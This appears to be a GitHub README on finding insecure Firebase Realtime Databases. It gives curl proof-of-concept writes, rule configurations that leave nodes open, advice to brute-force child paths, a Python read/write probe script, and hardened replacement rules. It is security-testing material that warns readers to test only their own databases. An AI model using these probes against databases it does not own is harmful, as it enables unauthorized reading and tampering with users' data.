# Insecure-Firebase

### Case 1:

### Allows anonymous read and write, or only read access

Add `.json` to the end of the database URL. If the response is `null` or JSON data instead of a `Permission denied` error, the database allows unauthenticated reads: `null` means the root path is readable but currently empty, data means the contents are exposed. Whether anyone can also write has to be checked separately, with the POST below.

For example: https://insecure-firebase.firebaseio.com/.json returns `null`


#### POC (Insert data)
```
curl -X POST https://insecure-firebase.firebaseio.com/testing.json \
  -d '{"cat": "meow", "dog": "bowbow"}'
```
This creates a new data location `/testing` in the database (`POST` appends the object under a generated push ID; use `PUT` to write to the exact path).

Now visit https://insecure-firebase.firebaseio.com/testing.json or https://insecure-firebase.firebaseio.com/.json

and you will see the new data in the database.


Firebase security rules that lead to this vulnerability:

```
{
  /* Visit https://firebase.google.com/docs/database/security to learn more about security rules. */
  "rules": {
    ".read": true,
    ".write": true
  }
}
```
In the above configuration both `.read` and `.write` are set to `true` at the root, so anyone can read and write the whole database. Because rules cascade, no child node can take that access away again. Developers sometimes use these settings for testing and later forget to change them to only allow app users to read or write data (rare to find).

### Case 2:

### When the child is specified with no auth

When testing a Firebase database, what I was doing before was adding `.json` at the end of the database URL: if it returned `null` or any data the database was vulnerable, but if it returned `permission denied` I assumed the database was secure.

Then I watched a video shared by [@B3nac](https://twitter.com/B3nac)
where he showed that a developer can set rules for child nodes as well.
Like this:

```
{
  /* Visit https://firebase.google.com/docs/database/security to learn more about security rules. */
  "rules": {
    "Admin": {
      ".read": false,
      ".write": false
    },
    "Users": {
      ".read": true,
      ".write": false
    }
  }
}
```

For the purpose of demonstration I deployed a Firebase database with the above rules, so if you go to

`https://in-firebase-683e6.firebaseio.com/.json`

you will get a `Permission denied` error, but if you go to https://in-firebase-683e6.firebaseio.com/Users.json you will get user data, which is exposed because of the rule set on the `Users` node. A denied root therefore proves nothing about the children, and we can brute-force child paths to find other vulnerable endpoints.


Then I thought that a developer can also set write-only access on an endpoint, which means that if we go to that endpoint we get a `Permission denied` error, but if we try to write some data the write succeeds. The rules on the development side look like this:

```
{
  /* Visit https://firebase.google.com/docs/database/security to learn more about security rules. */
  "rules": {
    "Logs": {
      ".read": false,
      ".write": true
    }
  }
}
```

Here the developer sets the write rule on the `Logs` endpoint, so if you go to https://in-firebase-683e6.firebaseio.com/Logs.json you will get a `Permission denied` error, but you can still write data to it.

Example:
```
curl -X POST https://in-firebase-683e6.firebaseio.com/Logs.json -d '{"test": "testing"}'
```

If you run the above command you will get something like `{"name":"-M3B_iyZE1RPDaPNuknX"}` in the response, which means the write was successful (the value is the push ID Firebase generated for the new record). Note that a GET-only scan never detects this case.
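The manual checks from Case 1 and Case 2 (root readable, child readable while the root is denied, write-only child) combined into one probe script. This is an added example, not code from the original write-up: it uses the page's demo database URL and node names only as constants and never contacts them, because the `demo_fetch` responder below is constructed to reproduce the page's responses offline. Swap in `http_fetch` to probe a real database you own; the write probe pushes one marker record and deletes it again.

```python
"""Node-by-node probe of a Firebase Realtime Database over its REST API.

Added example (not part of the original write-up). The database URL, node
names and the responses in demo_fetch are constructed for demonstration.
"""
import json
import urllib.error
import urllib.request

DENIED = "permission denied"


def rtdb_url(base_url, node=""):
    """REST URL for a node: https://<db>.firebaseio.com/<node>.json ("" = root)."""
    base = base_url.rstrip("/")
    path = node.strip("/")
    return f"{base}/{path}.json" if path else f"{base}/.json"


def http_fetch(method, url, body=None):
    """Real transport. Returns (status, text); Firebase answers denials with 401."""
    req = urllib.request.Request(url, data=body, method=method,
                                 headers={"Content-Type": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode()


def classify_read(status, text):
    """'denied' | 'empty' (readable, nothing stored) | 'exposed' | 'error'."""
    if status in (401, 403) or DENIED in text.lower():
        return "denied"
    if status != 200:
        return "error"
    return "empty" if text.strip() == "null" else "exposed"


def probe_node(base_url, node, fetch=http_fetch, test_write=False):
    """GET the node; optionally POST a marker record and delete it again."""
    url = rtdb_url(base_url, node)
    status, text = fetch("GET", url)
    result = {"node": node or "/", "read": classify_read(status, text), "write": "untested"}
    if test_write:
        status, text = fetch("POST", url, json.dumps({"probe": "firebase-scan"}).encode())
        if status == 200:
            result["write"] = "allowed"
            # A successful POST returns {"name": "<push id>"}; remove our record.
            key = json.loads(text)["name"]
            fetch("DELETE", rtdb_url(base_url, f"{node}/{key}"))
        else:
            result["write"] = "denied"
    return result


def probe_database(base_url, nodes, fetch=http_fetch, test_write=False):
    """Probe the root and every candidate child; returns one dict per path."""
    return [probe_node(base_url, n, fetch, test_write) for n in [""] + list(nodes)]


def demo_fetch(method, url, body=None):
    """Constructed offline responder mimicking the page's demo database:
    root and Admin denied, Users readable, Logs write-only."""
    if method == "GET" and url.endswith("/Users.json"):
        return 200, '{"u1": {"email": "alice@example.com"}}'
    if method == "POST" and url.endswith("/Logs.json"):
        return 200, '{"name": "-M3B_iyZE1RPDaPNuknX"}'
    if method == "DELETE" and url.endswith("/Logs/-M3B_iyZE1RPDaPNuknX.json"):
        return 200, "null"
    return 401, '{"error": "Permission denied"}'


if __name__ == "__main__":
    base = "https://in-firebase-683e6.firebaseio.com"
    for r in probe_database(base, ["Admin", "Users", "Logs"], demo_fetch, test_write=True):
        print(r)
```

Only enable `test_write` against a database you own: even with the cleanup `DELETE`, a write-only node (like `Logs`) means the record you pushed is invisible to you, and a root with `.write: true` is exactly the kind of production database the Note at the end warns about.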
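For comparison, the same three nodes with rules that close both cases above. This is an added example, not the rules from the original write-up; the `$uid` and `$logId` wildcards and the `ts`/`msg` field names are assumed for illustration.

```json
{
  "rules": {
    "Admin": {
      ".read": false,
      ".write": false
    },
    "Users": {
      "$uid": {
        ".read": "auth != null && auth.uid === $uid",
        ".write": "auth != null && auth.uid === $uid"
      }
    },
    "Logs": {
      ".read": false,
      ".write": "auth != null",
      "$logId": {
        ".validate": "newData.hasChildren(['ts', 'msg'])"
      }
    }
  }
}
```

With these rules `Users.json` is no longer listable at all (no rule grants read on the parent, only on a single `$uid` child to its owner), and a `POST` to `Logs.json` needs a signed-in user and a record carrying both fields. One caveat: if the app has anonymous sign-in enabled, `auth != null` is satisfied by anyone who calls the sign-in API, so it is only marginally stronger than `true`; restrict by `auth.uid` or a custom claim where that matters.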


## Exploiting with Firebase API key

```
Currently working on this I will add more details later
```
A developer can restrict an API key to control which websites, IP addresses or applications may use it.
![alt api-restriction](https://raw.githubusercontent.com/tauh33dkhan/Hacking-Insecure-Firebase-Database/master/api-restrict.png)

### Extra

Recovering Firebase remote config: https://blog.deesee.xyz/android/automation/2019/08/03/firebase-remote-config-dump.html

### Note
Please set up your own database and test on it before playing with a production database, because one mistake can mess up all the data out there.

#### Contact Me
[@tauh33dkhan](https://twitter.com/tauh33dkhan)